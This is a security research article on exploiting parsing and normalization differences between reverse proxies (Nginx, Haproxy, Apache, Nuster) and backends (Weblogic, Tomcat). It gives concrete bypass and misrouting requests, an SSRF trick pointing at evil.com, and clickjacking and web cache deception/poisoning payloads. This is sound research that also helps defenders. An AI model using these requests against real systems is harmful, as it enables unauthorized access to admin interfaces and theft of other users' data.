The basic idea of a reverse proxy is quite simple. It’s an intermediate server between a user and a back-end server. The purpose of it can be quite different: it can route requests depending on the URL to various backends or it can just be there “to protect” against some attacks or simply to analyze traffic. The implementations can be different too, but the main sequence of steps is quite the same.
A reverse proxy must receive a request, it must process it, perform some action on it and forward to a backend.

Processing of a request consists of several main steps:

 

A) 1. Parsing
When a reverse proxy receives a request, it must parse it: to get a verb, a path, a HTTP version, host header and other headers and body.
GET /path HTTP/1.1
Host: example.com
Header: something
Everything may look quite simple, but if you dive into details, you will see implementations are different.

Some examples:

– If a reverse supports Absolute-URI, how will it parse it? Does Absolute-URI have a higher priority than Host header?:
GET http://other_host_header/path HTTP/1.1
Host: example.com
 – URL consists of scheme:[//authority]path[?query][#fragment], and browsers don’t send #fragment. But how must a reverse proxy handle #fragment?

Nginx throws fragment off, Apache returns a 400 error (due to # in the path), some others handle it as a usual symbol.

– How does it handle symbols which must be URL-encoded?
GET /index.php[0x01].jsp HTTP/1.1
2. URL decoding
Due to standards, symbols with a special meaning in the URL must be URL-encoded (%-encoding), like the double quote (") or “greater than” sign (>). But practically, any symbol can be URL-encoded and sent in a path part. Many web servers perform URL-decoding while processing a request, so next requests will be treated in the same way by them.
GET /index.php HTTP/1.1
GET %2f%69%6e%64%65%78%2e%70%68%70 HTTP/1.1
 3. Path normalization
Many web servers support path normalization. Main cases are well-known:
/long/../path/here -> /path/here
/long/./path/here -> /long/path/here
But what about /..? For Apache, it’s an equivalent of  /../, but for Nginx it means nothing.
/long/path/here/.. -> /long/path/ - Apache
/long/path/here/.. -> /long/path/here/.. - Nginx
The same with // (“empty” directory). Nginx converts it to just one slash /, but, if it’s not the first slash, Apache treats it as a directory.
//long//path//here -> /long/path/here - Nginx
//long/path/here -> /long/path/here - Apache
/long//path/here -> /long//path/here - Apache
Here are some additional (weird) features which are supported by some web servers. For example: support of path parameters – /..;/ is valid for Tomcat and Jetty or traversal with backslash (\..\).

B) Applying rules and performing actions on a request

Once a request is processed, the reverse proxy can perform some actions on the request due to its configuration. Important to note that in many cases, rules of a reverse proxy are path (location) based. If the path is pathA, do one thing, if pathB – do another.

Depending on the implementation or on the configuration, a reverse proxy applies rules based on a processed (parsed, URL-decoded, normalized) path or on an unprocessed path (rare case). It’s also important for us to note if it is case-sensitive or not. For example, will the next paths be treated equally by a reverse proxy?:
/path1/ == /Path1/ == /p%61th1/ == /lala/../path1/

C) Forwarding to a back-end

The reverse proxy has processed a request, found appropriate rules for it and performed necessary actions. Now it must send (forward) it to a backend. Will it send the processed request or initial request? Obviously, if it has modified the request, then it sends the modified version, but in this case, it must perform all the necessary steps, for example, to perform URL-encoding of special symbols. But what if the reverse proxy just forwards all requests to only one backend, maybe forwarding the initial request is a good idea?

As you can see all these steps are quite obvious and there are not so many variations. Still, there are differences in implementations, which we, as attackers, can use for our goals.

Therefore, the idea of all attacks described below is that a reverse proxy processes a request, finds and applies rules and forwards it to a backend. If we find an inconsistency between the way a reverse proxy processes a request and the way a backend server processes it, we are then able to create such a request(path) which is interpreted like one path by the reverse proxy and a completely different path by the backend. So, we will be able to bypass or to forcefully apply some rules of the reverse proxy.

Here are some examples

Nginx

Nginx is a well-known web server, but is also very popular as a reverse proxy. Nginx supports Absolute-URI with an arbitrary scheme and higher priority than a Host header. Nginx parses, URL-decodes and normalizes a request path. Then it applies location-based rules depending on the processed path.

But it looks like Nginx has two main behaviors and each of them has its own interesting features:

- With trailing slash
location / {
    proxy_pass http://backend_server/;
}
In this configuration, Nginx forwards all requests to the `backend_server`. It sends the processed request to the backend, meaning that Nginx must URL-encode the necessary symbols. The interesting thing for an attacker is that Nginx doesn’t encode all the symbols which browsers usually do. For example, it doesn’t URL-encode ' " < >.

Even if there is a web application (back-end server) which takes a parameter from a path and which is vulnerable to XSS, an attacker cannot exploit it, because modern browsers (except dirty tricks with IE) URL-encode these symbols. But if there is Nginx as a reverse proxy, an attacker can force a user to send a URL-encoded XSS payload in the path. The Nginx decodes it and sends the decoded version to the backend server, which makes exploitation of XSS possible.
Browser -> http://victim.com/path/%3C%22xss_here%22%3E/ -> Nginx -> http://backend_server/path/<"xss_here">/ -> WebApp
- Without trailing slash
location / {
    proxy_pass http://backend_server;
}
The only difference between this config and the previous one is the lack of the trailing slash. Although seemingly insignificant, it forces Nginx to forward an unprocessed request to the backend. So if you send /any_path/../to_%61pp#/path2, after processing of the request, Nginx will try to find a rule for `/to_app`, but it will send /any_path/../to_%61pp#/path2 to the backend. Such behavior is useful to find inconsistencies.

Haproxy

Haproxy is a load balancer (with HTTP support). It doesn’t make much sense to compare it to Nginx, but it will give you an idea of a different approach.

Haproxy makes minimal processing of a request. So there is no “real” parsing, URL-decoding, normalization. It doesn’t support Absolute-URI either.

Therefore, it takes everything (with few exceptions) between a verb and HTTP version (GET !i<@>?lala=#anything HTTP/1.1) and, after applying rules, forwards it to a backend server. However it supports path-based rules and allows it to modify requests and responses.

How proxies are used

While I was working on this research, analyzing various configurations of reverse proxies, I came to the conclusion that we can both bypass and apply rules of a reverse proxy. Therefore, to understand the real potential of reverse proxy related attacks, we must have a look at their abilities.

First of all, a reverse proxy has access to both a request and a response (including those which it sends/receives from a backend server). Secondly, we need a good understanding of all the features which a reverse proxy supports and how people configure them.

How can a reverse proxy handle a request?:
  1. Routing to endpoint. It means that a reverse proxy receives a request on one path (/app1/), but forwards the request to a completely different one (/any/path/app2/) on a backend. Or it forwards the request to a specific backend depending on a Host header value.
  2. Rewriting path/query. This is similar to the previous one, but usually involves different internal mechanisms (regexp)
  3. Denying access. When a reverse proxy blocks a request to a certain path.
  4. Headers modification. In some cases, a reverse proxy may add or change headers of the request. It could be a cool feature for an attacker, but it’s hard to exploit with a black box approach.
How can a reverse proxy handle a response?:
  1. Cache. Many reverse proxies support caching of response.
  2. Headers modification. Sometimes a reverse proxy adds or modifies response headers (even security related), because it cannot be done on a backend server
  3. Body modification. Reverse proxies will sometimes modify the body too. Edge Side Includes (ESI) is an example of when this can happen.
All this is important for to see more potential attacks, but also understand that in many cases we don’t need to bypass, but apply rules. Which leads to a new type of attacks on reverse proxies – proxy rules misusing.

Server-Side attacks

Bypassing restriction

The most well known case about reverse proxy related attacks.

When someone restricts access (3. Denying access), an attacker needs to bypass it.

Here is an example.
Let’s imagine that there are Nginx as a reverse-proxy and Weblogic as a backend server. Nginx blocks access to an administrative interface of Weblogic (everything that starts with /console/).
Configuration:

location /console/ {
    deny all;
    return 403;
} 
location / {
    proxy_pass http://weblogic;
}
As you can see, proxy_pass here is without trailing slash, which means that a request is forwarded unprocessed. Another important thing to bypass the restriction is that Weblogic treats # as a usual symbol. Therefore, an attacker can access the administrative interface of Weblogic by sending such a request:
GET /#/../console/ HTTP/1.1
When Nginx starts processing the request, it throws off everything after #, so it skips the /console/ rule. It then forwards the same unprocessed path (/#/../console/) to the Weblogic, the Weblogic processes the path and after path normalization, we are left with/console/.

Request Misrouting

It’s about “1. Routing to endpoint” and, in some cases, “2. Rewriting path/query”.
When a reverse proxy forwards requests only to one endpoint, it can make an illusion that an attacker cannot reach other endpoints on a backend or that it cannot reach a completely different backend.

Example 1.
Let’s have a look at similar combinations: Nginx+Weblogic. In this case, Nginx proxies requests only to a certain endpoint of Weblogic (http://weblogic/to_app). So only requests, which come to a path /to_app on Nginx, are forwarded to the same path on Weblogic. In this situation, it may look like Weblogic’s administrative interface (console) or other paths are not accessible for an attacker.
location /to_app {
    proxy_pass http://weblogic;
}
In order to misroute requests to other paths, we need to know two things again. Firstly, the same as in the example above – proxy_pass is without a trailing slash.

Secondly, Weblogic supports “path parameters” (https://tools.ietf.org/html/rfc3986#section-3.3). For example, /path/to/app/here;param1=val1, and param1 will be accessible in a web app through API.

I think many are aware about this feature (especially after the Orange Tsai’s presentation from BlackHat in the context of Tomcat. Tomcat allows to perform really “weird” traversals like /..;/..;/. But Weblogic treats path parameters differently, as it treats everything after the first ; as a path parameter. Does it mean that this feature is useless for an attacker?

Nope. Let’s have a look at this “magic” which allows accessing any path on Weblogic in this configuration.
GET /any_path_on_weblogic;/../to_app HTTP/1.1
When Nginx receives such a request, it normalizes the path. From /any_path_on_weblogic;/../to_app it gets /to_app which successfully applied to the rule. But Nginx forwards /any_path_on_weblogic;/../to_app and Weblogic, during parsing, treats everything after ; as a path parameter, so Weblogic sees /any_path_on_weblogic. If it’s necessary, an attacker can go “deeper” by increasing the amount of /../ after ;.

Example 2.
This one is about a “bug” of Nginx. But this “bug” is just a consequence of how Nginx works (so will not be fixed)

A rule location /to_app means that all paths which start with /to_app (prefix) fall under the rule. So, /to_app, /to_app/, /to_app_anything (including special symbols) fall under it. Also, everything after this prefix(/to_app) will be taken and then concatenated with value in proxy_pass.
Look at the next config. Nginx, after processing /to_app_anything, will forward the request to http://server/any_path/_anything
location /to_app {
    proxy_pass http://server/any_path/;
}
If we put both features together, we will see that we can go to any path one level higher on almost any backend. We just need to send:
GET /to_app../other_path HTTP/1.1
Nginx applies /to_app rule, gets everything(../other_path) after the prefix, concatenates it with a value from proxy_pass, so it forwards http://server/any_path/../other_path to a backend. If the backend normalizes the path, we can reach a completely different endpoint.

Actually, this trick is similar to a well-known alias trick. However, the idea here is to show an example of possible misusing of reverse proxy’s features.

Example 3.
As I mentioned before, it’s a common case when a reverse proxy routes requests to different backends depending on the Host header in a request.

Let’s have a look at Haproxy configuration which says that all requests with example1.com in the Host header must be proxied to a backend example1_backend192.168.78.1:9999.
frontend http-in
acl host_example1 hdr(host) -i example1.com
use_backend example1_backend if host_example1
backend example1_backend
server server1 192.168.78.1:9999 maxconn 32
Does such a configuration mean that an attacker cannot access other virtual hosts of a backend server? It may look like that, but an attacker can easily do it. Because, as mentioned above, Haproxy doesn’t support Absolute URI, but most web-servers do. When Haproxy receives Absolute URI, it forwards this unprocessed Absolute URI to a backend. Therefore, just by sending next request, we can easily access other virtual hosts of the backend server.
GET http://unsafe-value/path/ HTTP/1.1
Host: example1.com
Is it possible to force a reverse proxy to connect to an arbitrary backend server? I’d say that in most cases (Nginx, Haproxy, Varnish), this cannot be done, but Apache (in some configurations/versions) is vulnerable to it. As Apache “parses” a host value from ProxyPass, we can send something like GET @evil.com HTTP/1.1, so Apache sees a value http://backend_server@evil.com and sends the request to `evil.com` (SSRF). Here you can see an example of such vulnerability.

Client-Side attacks

If we have a look at reverse proxy features again, we can see that all response-related have a potential for client-side attacks. It doesn’t make them useless. I’d say otherwise. But client-side attacks have additional limitations to possible inconsistencies between the reverse proxy and the web server, as the browser process a request before sending it.

Browser processing

In a client-side attack, an attacker needs to force a victim’s browser to send a special request, which will influence a response, to a server. But the browser follows the specifications and processes the path before sending it: ^The browser parses the URL (e.g. throws off a fragment part), URL-encodes all the necessary symbols (with some exceptions) and normalizes a path. Therefore, to perform such attacks, we can only use a “valid” request which must fit into the inconsistency between three components (browser, reverse proxy, backend server).

Of course, there are differences in browser implementations, plus some features which still allows us to find such inconsistencies:
  • For example, Chrome and IE don’t decode %2f, so a path like that /path/anything/..%2f../ will not be path normalized.
  • Older versions of Firefox didn’t URL-decode special symbols before normalization, but now it behaves in a similar way to Chrome.
  • There is information that Safari doesn’t URL-decode a path, so we can force it to sent such a path /path/%2e%2e/another_path/.
  • Also, IE, as usual, has some magic: it doesn’t process a path when it’s redirected with Location header. 

Misusing Header modification

A common task for reverse proxy is to add, delete or modify headers from a response of a backend. In some situations, it’s much easier than modification of the backend itself. Sometimes it involves modification of security-important headers. So as attackers, we may want to force a reverse proxy to apply such rules to wrong responses (from wrong backend locations) and then use it for attacks on other users.

Let’s imagine that we have Nginx and Tomcat as a backend. Tomcat, by default, sets header X-Frame-Options: deny, so a browser cannot open it in an iframe. For some reason, a part of the web application (/iframe_safe/) on the Tomcat must be accessible through iframe, so Nginx is configured to delete the her X-Frame-Options for this part. However, there is no potential for clickjacking attacks on iframe_safe. Here is the configuration:
location /iframe_safe/ {
    proxy_pass http://tomcat_server/iframe_safe/;
    proxy_hide_header "X-Frame-Options";
}
location / {
    proxy_pass http://tomcat_server/;
}
However, as attackers, we can make a request which falls under the iframe_safe rule, but it will be interpreted by Tomcat as a completely different location. Here it is:
<iframe src="http://nginx_with_tomcat/iframe_safe/..;/any_other_path">
A browser doesn’t normalize such a path. For Nginx it falls under the iframe_safe rule. Since Tomcat supports path parameters, after path normalization, it will get /any_other_path. Therefore, in such a configuration, any path of Tomcat can be iframed, so an attacker can perform clickjacking attacks on users.

Of course, with a similar approach, other security-related headers (e.g. CORS, CSP, etc) might be misused too.

Caching

Caching is one of the most interesting, with a good potential for various attacks, but is still a little-known feature of reverse proxies. Recently, cache-related attacks have gotten more attention in some awesome researches including Web Cache Deception and Practical Web Cache Poisoning. In my research, I’ve been focusing on caching too: I wanted to analyze various implementations of cache. As a result, I’ve got several ideas on how to improve both cache deception and cache poisoning attacks.

How it works
There are several factors on cache of a reverse proxy which help us with understanding attacks.
The idea of caching is quite simple. In some situations, a reverse proxy stores a response from a backend in the cache and then returns the same response from the cache without accessing the backend. Some reverse proxies support caching by default, some require configuration. Generally, a reverse proxy uses as a key of cache, a concatenation of Host header value with unprocessed path/query from a request.

To decide if it is Ok to cache a response or not, most reverse proxies check Cache-Control and Set-Cookie headers from a response of a backend. Reverse proxies don’t store responses with Set-Cookie at all, but Cache-Control, as it describes a caching policy and requires additional parsing. Format of Cache-control header is quite complex, but basically, it has several flags which allows caching or not, and sets for how long a response can be cached.

Cache-Control header may look like these:
Cache-Control: no-cache, no-store, must-revalidate 
Cache-Control: public, max-age=31536000
The first example forbids caching by a reverse proxy, the second – allows it. The absence of a Cache-Control header usually means that a reverse proxy is allowed to store a response.

Many web servers, application servers and frameworks set Cache-Control headers automatically and correctly. In most cases, if a web app uses session in an script, it will set Cache-Control headers which restricts caching, so usually programmers don’t need to think about it. However, in some situations, for example, if a web application uses its own session mechanism, Cache-Control header can be set incorrectly.

Attacks
A commonly used feature of a reverse proxy cache is “aggressive caching” (it’s not really an official term, but describes the idea). In some cases (for example, a backend can be too strict about caching and doesn’t allow to cache anything) an administrator, instead of changing the backend, changes rules of a reverse proxy, so it starts caching responses even with Cache-Control header which restricts caching. Usually such rules have some limitations. For example, to cache only responses of certain extensions (.jpg, .css, .js), or from specific paths (/images/).

If a reverse proxy has a path-based rule which allows aggressive caching, an attacker can create such a path which falls into the rule but will be interpreted as a completely different path by a backend server.

As an example let’s take Nginx+Tomcat again. Next rule intends to force Nginx to cache all the responses from the /images directory of Tomcat.
location /images {
    proxy_cache my_cache;
    proxy_pass http://tomcat_server;
    proxy_cache_valid 200 302 60m;
    proxy_ignore_headers Cache-Control Expires;
}
As attackers, we can misuse this rule to perform a web cache deception attack. All we need to do is to force a victim user to open the next URL (using img, for example):
<img src="http://nginx_with_tomcat.com/images/..;/index.jsp">
A victim’s browser then sends a request (with authentication cookies). Nginx sees /images, so forwards the request to Tomcat and then caches a response (it doesn’t care about Cache-Control headers). Again, for Tomcat, a path after normalization is completely different – /index.jsp. In this way an attacker can force Nginx to cache any page of Tomcat. To read this cached response, the attacker just needs to access the same path (/images/..;/index.jsp) and Nginx returns the victim’s sensitive data (e.g. csrf token).

In some way, it’s just a variation web cache deception, but not only.

Let’s think about a cache poisoning attack. The attack relies on finding unkeyed values from a request which can significantly (from a security point of view) influence a response, but at the same time, this response must be cached by a reverse proxy, so Cache-Control header must be permissive. If we mix everything together, we will be able to find more ways to exploit cache poisoning attacks.

Let’s imagine the situation. There is Nuster (it’s a cache proxy based on Haproxy) and a web application. The web application has a self-XSS vulnerability (which works only in an attacker’s account) in /account/attacker/. Nuster is configured to cache all the responses from /img/ directory on the web application:
nuster cache on
nuster rule img ttl 1d if { path_beg /img/ }
The attacker just needs to create a special URL (/img/..%2faccount/attacker/), so Nuster applies an “aggressive caching” rule, still, the web app returns a response of self XSS (it sees /account/attacker/). The response with an XSS payload will be cached by Nuster (with the key: Host + /img/..%2faccount/attacker/), so the attacker will be able to misuse this cache to XSS attack other users of the web application.From the self-XSS, we’ve got a usual XSS.

Conclusion

I have showed several examples of vulnerable configurations for each attack type. But exact cases are not so important. I wanted to give a fresh look on reverse proxy related attacks. If we know how a reverse proxy works, how it processes a request and what is the difference compared to a backend server, we (as attackers) will be able to reach more endpoints or perform more sophisticated attacks on users.

Regarding protections against such attacks, I see no “silver bullet” here (until we have a really good standard/specification on how to handle a request/path), but I think this project could help defenders as well. If you know your proxy and its limitations, you will be able to change its configuration accordingly.

Due to my desire to share my thoughts and explain stuff, the article has become very big. Still, I had to skip a bunch of tricks, you could see them in the presentation here. And the most important point of this research – “raw” results. The research is not finished yet. I will fulfill it step by step with other software. Push requests are really appreciated.

While preparing this research, I found several other kinds of similar ones, including – https://github.com/irsdl/httpninja. Through a combination of our projects, it’s possible to almost get a matrix of possible inconsistencies.